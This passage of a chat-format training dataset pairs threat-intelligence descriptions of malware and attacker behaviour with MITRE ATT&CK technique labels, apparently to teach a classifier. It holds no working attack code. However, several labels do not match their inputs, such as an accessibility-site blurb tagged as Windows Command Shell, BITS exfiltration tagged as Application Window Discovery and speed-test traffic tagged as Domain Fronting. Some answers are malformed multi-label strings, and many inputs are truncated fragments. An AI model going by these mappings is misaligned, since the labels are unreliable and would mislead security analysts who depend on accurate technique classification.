- "content": "The macro finishes by running the dropped VBScript \"AppPool.vbs\" file by running \"wscript C:\\ProgramData\\WindowsAppPool\\AppPool.vbs\". When first executed, the \"AppPool.vbs\" file will create the following scheduled task to execute every minute, which provides BONDUPDATER persistence and the ability to continually run on the system as the Trojan does not have a main loop to carry out its functionality"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackConfig has the ability to gather the victim's computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SEASHARPEE can timestomp files on victims using a Web shell."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used RDP to move laterally in victim networks."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MCMD has been named Readme.txt to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volexity has identified multiple new attack campaigns being launched by OceanLotus via multiple fake websites and Facebook pages that have been set up within the last year. In addition to targeting those within Vietnam, Volexity has seen renewed targeting of OceanLotus's neighbors throughout Southeast Asia. These websites have been observed profiling users, redirecting to phishing pages, and being leveraged to distribute malware payloads for Windows and OSX. This post will focus on one of the larger campaigns where OceanLotus has leveraged multiple fake news websites to target users"
- },
- {
- "role": "assistant",
- "content": "T1585.001 - Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OFF ON Vision Impaired Profile Enhances website's visuals This profile adjusts the website, so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. This website utilizes various technologies that are meant to make it as accessible as possible at all times. We utilize an accessibility interface that allows persons with specific disabilities to adjust the website’s UI (user interface) and design it to their personal needs. This application remediates the website’s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments. In this process, we provide screen-readers with meaningful data using the ARIA set of attributes. It will also extract texts embedded within the image using an OCR (optical character recognition) technology. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Additional UI, design, and readability adjustments . 1) Font adjustments – users can increase and decrease its size, change its family (type), adjust the spacing, alignment, line height, and more. 7) Additional functions – we allow users to change cursor color and size, use a printing mode, enable a virtual keyboard, and many other functions. Still, we are continually improving our accessibility, adding, updating, improving its options and features, and developing and adopting new technologies"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identifies the victim username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has developed custom malware such as Hildegard."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stop the service COMSysApp - Configure the service to autostart (to set up persistence on the system) - Modify registry keys to launch the DLL unser svchost.exe - Specify the malicious DLL path to be loaded into the svchost process. Immediately restart the service - Remove the batch files to reduce the fingerprint on the system"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution', 'T1055 - Process Injection', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1070.004 - Indicator Removal on Host: File Deletion', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses 's malleable C2 functionality to blend in with network traffic."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2"
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deletes some of its files used during operations as part of cleanup, including removing applications such as 7z.exe, tor.exe, ssh.exe"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has decrypted strings and imports using RC4 during execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT has the ability to use the Gmail web UI to receive commands and exfiltrate information."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another indicator of a Qakbot infection is HTTPS traffic to cdn.speedof[.]me. The domain speedof[.]me is used by a legitimate Internet speed test service. Although this is not malicious traffic, we frequently see traffic to cdn.speedof[.]me during Qakbot infections. Figure 20 shows this activity from our pcap."
- },
- {
- "role": "assistant",
- "content": "T1090.004 - Domain Fronting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk has the ability to use the command line to control execution on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY's `amsiPatch.py` module can disable Antimalware Scan Interface (AMSI) functions."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RGDoor establishes persistence on webservers as an IIS module."
- },
- {
- "role": "assistant",
- "content": "T1505.004 - IIS Components"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike's \"beacon\" payload can collect information on process details."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has exfiltrated stolen data to OneDrive accounts."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear can scramble functions not to be executed again with random values."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SQLRat has used been observed deleting scripts once used."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay has created Registry Run keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is a rootkit that hides certain operating system artifacts."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of writing to a Registry Run key to establish."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has renamed system utilities such as \"wscript.exe\" and \"mshta.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1036.003 - Masquerading: Rename System Utilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT encrypts collected data with AES and Base64 and then sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TG-3390 has used additional web shells containing similarly formatted passwords"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike's \"beacon\" payload is capable of running shell commands without \"cmd.exe\" and PowerShell commands without \"powershell.exe\""
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used network scanning and enumeration tools, including ."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XAgentOSX contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses commands such as netsh advfirewall firewall to discover local firewall settings."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ProxyShell elevation of privilege on the Exchange PowerShell Backend (CVE-2021-34523), Windows Background Intelligent Transfer Service (BITS) improperly handling symbolic links (CVE-2020-0787), and abusing the CMSTPLUA COM interface have all been seen as methods of privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EKANS can use Windows Mangement Instrumentation (WMI) calls to execute operations."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) contains the following formula that Excel will save to the “A0” cell in the worksheet: The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp://micrrosoft[.]net/winupdate.ps1"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A payload was packed with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike uses a command-line interface to interact with systems."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wrote indicators based on observed attacker activity • Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can retrieve IP and network adapter configuration information from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "schedules the execution one of its modules by creating a new scheduler task."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has lured victims to click malicious links delivered via spearphishing emails (often sent from compromised accounts)."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AutoIt backdoor is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This final payload is the ThreatNeedle loader running in memory. In addition, the malware saves the configuration data as a registry key encrypted in RC4"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "yty runs \"ipconfig /all\" and collects the domain name."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK checks for antivirus and forensics software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has used malicious JavaScript files for several components of their attack."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER can capture a screenshot from a victim."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy stages collected data in a text file."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SombRAT loader recovered in this incident was a 64-bit variant that allowed the malicious actor to remotely download and load executable dynamic-link libraries (DLL) plugins on the affected system (Ingress Tool Transfer [T1105]). The loader used hardcoded public RSA keys for command and control (C2) sessions (Command and Control [TA0011]). The C2 communications were encrypted using Advanced Encryption Standard (AES), resulting in a Secure Sockets Layer tunnel with the threat actors (Encrypted Channel: Asymmetric Cryptography [T1573.002"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The loader performs a last check to ensure that the operating systems keyboard and language settings are not set to Russian and creates a mutex with a hardcoded name ‘ld_201127’. The latter is to avoid double execution of its own instance"
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor has distributed its dropper embedded in an archive file (외교부 가판 2021-05-07.zip) as an attachment through spearphishing emails. The archive file contains a JavaScript file (외교부 가판 2021-05-07.pdf.jse) which pretends to be a PDF file that contains two Base64 encoded blobs. The first one is the content of the decoy PDF file in Base64 format and the other one contains the AppleSeed payload also in Base64 format (encoded twice"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 added their own devices as allowed IDs for active sync using \"Set-CASMailbox\", allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals."
- },
- {
- "role": "assistant",
- "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SPACESHIP identifies files and directories for collection by searching for specific file extensions or file modification time."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, the threat actors used Visual Basic scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. Further, CARBON SPIDER frequently conducted hypervisor jackpotting by encrypting ESXi servers using a version of Darkside specifically designed for ESXi"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "drops a signed Microsoft DLL to disk."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain network information, including DNS, IP, and proxies."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Windows has a command to launch a remote shell and executes commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since the discovery of the {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll backdoor and its public analysis by multiple researchers, we observed some changes in the malware’s configuration data. First, the authors started removing the names from the helper DLLs (DNSprov.dll and the two versions of HttpProv.dll). Then the operators stopped packaging the third DLL (second version of HttpProv.dll), choosing to embed just one"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up."
- },
- {
- "role": "assistant",
- "content": "T1495 - Firmware Corruption"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the current username and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Nefilim ransomware creates a new wermgr.exe (the Windows error reporting manager) process and injects its payload to evade process-based defenses."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
